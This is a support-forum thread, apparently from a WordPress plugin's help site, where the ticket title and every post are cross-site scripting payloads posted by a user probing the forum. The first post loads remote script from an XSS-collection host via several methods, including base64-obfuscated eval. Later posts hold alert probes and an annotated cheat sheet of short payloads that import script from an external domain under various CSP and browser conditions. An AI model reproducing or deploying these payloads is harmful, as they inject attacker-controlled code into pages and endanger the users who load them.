A'””>”>'”>’>”>”>

#80825
  • Resolved A'””>”>'”>’>”>”>

    4 years, 2 months ago

    Rank Math free

    A'””><script src=https://akt.xss.ht></script>”>‘”>’>”><script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(“load”, b);a.open(“GET”, “//akt.xss.ht”);a.send();</script><script>$.getScript(“//akt.xss.ht”)</script>”><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYWt0Lnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= autofocus>

Viewing 6 replies - 1 through 6 (of 6 total)
  • A'””>”>'”>’>”>”>

    4 years, 2 months ago

    Rank Math free

    Hello CLick me

    A'””>”>'”>’>”>”>

    4 years, 2 months ago

    Rank Math free

    A'””>”>'”>’>”>”>

    4 years, 2 months ago

    Rank Math free

    <object/data=javascript:alert()>
    <a/href=”javascript%0A%0D:alert()”>

    A'””>”>'”>’>”>”>

    4 years, 2 months ago

    Rank Math free

    <svg onload=”a=domain,b=confirm,c=window,c.onerror=b;throw a”>aa

    • This reply was modified 4 years, 2 months ago by A'"">">'">'>">">. Reason: A'"">">'">'>">">
    A'””>”>'”>’>”>”>

    4 years, 2 months ago

    Rank Math free

    void”??globalThis?.alert?.(…[0b1_0_1_0_0_1_1_1_0_0_1,],)</script>” />data:text/html,<script>void”??globalThis?.alert?.(…[0b1_0_1_0_0_1_1_1_0_0_1,],)</script> ‘”>>data:text/html,<script>void”??globalThis?.alert?.(…[0b1_0_1_0_0_1_1_1_0_0_1,],)</script>

    A'””>”>'”>’>”>”>

    4 years, 2 months ago

    Rank Math free

    <!– If you control the name, will work on Firefox in any context, will fail in chromium in DOM –>
    <svg/onload=eval(name)>

    <!– If you control the URL, Safari-only –>
    <iframe/onload=write(URL)>

    <!– If you control the URL –>
    <svg/onload=eval('+URL)>

    <!– If you control the name, but unsafe-eval not enabled –>
    <svg/onload=location=name>

    <!– Just a casual script –>
    <script/src=//NJ.₨></script>

    <!– If you control the name of the window –>
    <iframe/onload=src=top.name>

    <!– If you control the URL –>
    <iframe/onload=eval(‘`’+URL)>

    <!– If number of iframes on the page is constant –>
    <iframe/onload=src=top[0].name+/\NJ.₨?/>

    <!– for Firefox only –>
    <iframe/srcdoc=”<svg><script/href=//NJ.₨ />”>

    <!– If number of iframes on the page is random –>
    <iframe/onload=src=contentWindow.name+/\NJ.₨?/>

    <!– If unsafe-inline is disabled in CSP and external scripts allowed –>
    <iframe/srcdoc=”<script/src=//NJ.₨></script>”>

    <!– If inline styles are allowed –>
    <style/onload=eval(name)>

    <!– If inline styles are allowed, Safari only –>
    <style/onload=write(URL)>

    <!– If inline styles are allowed and the URL can be controlled –>
    <style/onload=eval('+URL)>

    <!– If inline styles are blocked –>
    <style/onerror=eval(name)>

    <!– Uses external script as import, doesn’t work in innerHTML unless Firefox –>
    <!– The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header –>
    <svg/onload=import(/\\NJ.₨/)>

    <!– Uses external script as import, triggers if inline styles are allowed.
    <!– The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header –>
    <style/onload=import(/\\NJ.₨/)>

    <!– Uses external script as import –>
    <!– The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header –>
    <iframe/onload=import(/\\NJ.₨/)>

Viewing 6 replies - 1 through 6 (of 6 total)

The ticket ‘A'””>”>'”>’>”>”>’ is closed to new replies.